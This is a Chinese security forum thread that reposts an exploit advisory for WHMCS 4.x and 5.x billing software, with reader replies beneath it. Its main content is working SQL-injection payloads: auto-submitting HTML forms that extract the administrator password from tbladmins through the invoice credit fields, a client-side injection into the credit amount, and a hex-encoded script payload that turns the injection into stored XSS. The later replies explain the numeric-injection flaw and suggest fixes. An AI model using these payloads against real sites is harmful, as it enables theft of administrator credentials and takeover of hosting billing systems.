WHMCS 4.x & 5.x – Multiple Web Vulnerabilities

C4r1st

# Exploit Title: WHMCS v4.x & v5.x - Multiple Web Vulnerabilities
# Date: 2013-12-10
# Exploit Author: ahwak2000
# Vendor Homepage: http://whmcs.com/
# Version: 4.x , 5.x
# Tested on: win 7

+------------------+
| Vulnerability |
+------------------+

[AppleScript] 查看源码 复制代码

File : includes\dbfunctions.php 
  
function db_escape_string($string) {
  
$string = mysql_real_escape_string($string);
  
return $string;
  
}

+------------------+
| Description |
+------------------+

the script use this function to secure the input
the function disable only the ' and "
but we can bypass it if the query don't use '

+------------+
| Example |
+------------+

file : admin/invoices.php

[AppleScript] 查看源码 复制代码

[...]
$query = "UPDATE tblinvoices SET credit=credit-" . db_escape_string($removecredit) . " WHERE id='" . db_escape_string($id) . "'";
                full_query($query);
[...]

+------------+
|Exploitation|
+------------+

[AppleScript] 查看源码 复制代码

<html>
    <body onload="submitForm()">
    <form name="myForm" id="myForm"
    action="http://localhost/whmcs5214/admin/invoices.php" method="post">
    <input type="hidden" name="token" value="ahwak2000">
    <input type="hidden" name="id" value="1">
    <input type="hidden" name="removecredit" value="-99,invoicenum=(select password from tbladmins limit 0,1)">
    <input type="hidden" name="action" value="edit">
    </form>
    <script type='text/javascript'>document.myForm.submit();</script>
</html>

或者

[AppleScript] 查看源码 复制代码

<html>
    <body onload="submitForm()">
    <form name="myForm" id="myForm"
    action="http://localhost/whmcs5214/admin/invoices.php" method="post">
    <input type="hidden" name="token" value="ahwak2000">
    <input type="hidden" name="id" value="1">
    <input type="hidden" name="addcredit" value="-99,invoicenum=(select password from tbladmins limit 0,1)">
    <input type="hidden" name="action" value="edit">
    </form>
    <script type='text/javascript'>document.myForm.submit();</script>
</html>

+------------+
| Example 2|
+------------+

file : includes/invoicefunctions.php

[AppleScript] 查看源码 复制代码

function applyCredit($invoiceid, $userid, $amount="", $noemail = "") {
    $query = "UPDATE tblinvoices SET credit=credit+" . db_escape_string($amount) . " WHERE id='" . mysql_real_escape_string($invoiceid) . "'";
    full_query($query);
    $query = "UPDATE tblclients SET credit=credit-" . db_escape_string($amount) . " WHERE id='" . mysql_real_escape_string($userid) . "'";
    full_query($query);
[...]
    }
  
}
  
File: /viewinvoice.php
if ($invoice->getData("status") == "Unpaid" && 0 < $creditbal) {
      
    $creditamount = $whmcs->get_req_var("creditamount");
    if ($whmcs->get_req_var("applycredit") && 0 < $creditamount) {
        check_token();
  
        if ($creditbal < $creditamount) {
            echo $_LANG['invoiceaddcreditovercredit'];
            exit();
        }
        else {
            if ($balance < $creditamount) {
                echo $_LANG['invoiceaddcreditoverbalance'];
                exit();
            }
            else {
              
                applyCredit($invoiceid, $invoice->getData("userid"), $creditamount);
            }
        }
  
        redir("id=" . $invoiceid);
    }
  
    $smartyvalues['manualapplycredit'] = true;
    $smartyvalues['totalcredit'] = formatCurrency($creditbal) . generate_token("form");
  
    if (!$creditamount) {
        $creditamount = ($balance <= $creditbal ? $balance : $creditbal);
    }
  
    $smartyvalues['creditamount'] = $creditamount;
}

+------------+
|Exploitation|
+------------+
Go to http://127.0.0.1/whmcs5214/viewinvoice.php?id=1 <~ edit

if client have creditt and when he want to pay with credit

in the "Enter the amount to apply:" put 0.01,Address2=(SELECT password from tbladmins limit 0,1)

the admin password will be in the client address

+-----------------+
sql => xss

SQL can convert to XSS
Must Encode XSS to Hex
Example :

(SELECT 0x3C7363726970743E616C6572742827616877616B3230303027293B3C2F7363726970743E)

?

[AppleScript] 查看源码 复制代码

//<script>alert('ahwak2000');</script>

SQL can be modified to work when all members and supervisors
(SELECT 0x3C7363726970743E616C6572742827616877616B3230303027293B3C2F7363726970743E)# <~

+-------------------+

./END

游客，如果您要查看本帖隐藏内容请回复

野驴~

楼主，你这么牛逼，你妹子知道么。就是不知道现在最高版本到X了
我必须再回来补一句，楼主你回复可见的内容真实太牛逼了，楼下值得拥有，绝对的干货。快来回复吧！

Diana

这都可以 ~ 妞B吧 你家人都知道吗~

C4r1st

野驴~ 发表于 2013-12-31 01:26
楼主，你这么牛逼，你妹子知道么。就是不知道现在最高版本到X了
我必须再回来补一句，楼主你回复可见的内容 ...

我家妹子在床上就知道我已经有多牛逼了。嘿嘿

神仙

C4r1st 发表于 2013-12-31 11:47
我家妹子在床上就知道我已经有多牛逼了。嘿嘿

你为何这么猥琐

热心网友1

您好，感谢分享这个漏洞细节。看起来问题出在 `db_escape_string` 只转义了单引号和双引号，但在数字类型的参数（如 `credit` 加减运算的数值）没有用引号包围的地方，就可以直接插入额外的 SQL 语句。这种“数字型注入”在很多老版本 CMS 里都出现过，确实需要警惕利用 `is_numeric` 或强制类型转换来防御。另外，您提供的两个利用示例通过表单修改 `removecredit` 或 `addcredit` 的值，直接注入了子查询来读取管理员密码，非常简洁明了。请问在 5.x 的后续版本中，官方是否已经修复了这个函数？或者您是否知道有哪些补丁可以参考？

热心网友7

感谢分享这个漏洞情报。看下来主要是 `db_escape_string` 函数只处理了单引号和双引号，但在 `admin/invoices.php` 等地方直接把用户输入拼接到数值类型字段的 SQL 语句里，导致闭合后可以注入其他列，比如利用 `credit=-99,invoicenum=(select password ...)` 来读取管理员密码。这种绕过方式对于没有用引号包裹的字段确实很危险。 建议还在用 WHMCS 4.x 或 5.x 的站长尽快升级到最新版本，或者至少确认一下相关函数是否已经替换成参数化查询或更完善的过滤。另外也可以检查一下 `includes/dbfunctions.php` 里有没有补上对其他特殊字符的转义，避免类似问题。再次感谢详细的技术分析。

热心网友3

感谢分享这个漏洞详情。看起来 `db_escape_string` 函数只处理了单引号，但在数字或无需引号的查询中，比如 `admin/invoices.php` 里的 `credit=credit-` 拼接，就能直接注入 SQL 语句。示例中通过修改 `removecredit` 或 `addcredit` 参数的值，可以执行 `select password from tbladmins` 这样的查询，确实很危险。建议使用 WHMCS 4.x 或 5.x 的用户尽快升级到修复版本，或者检查代码中对数字类型输入是否做了额外的过滤和参数化查询。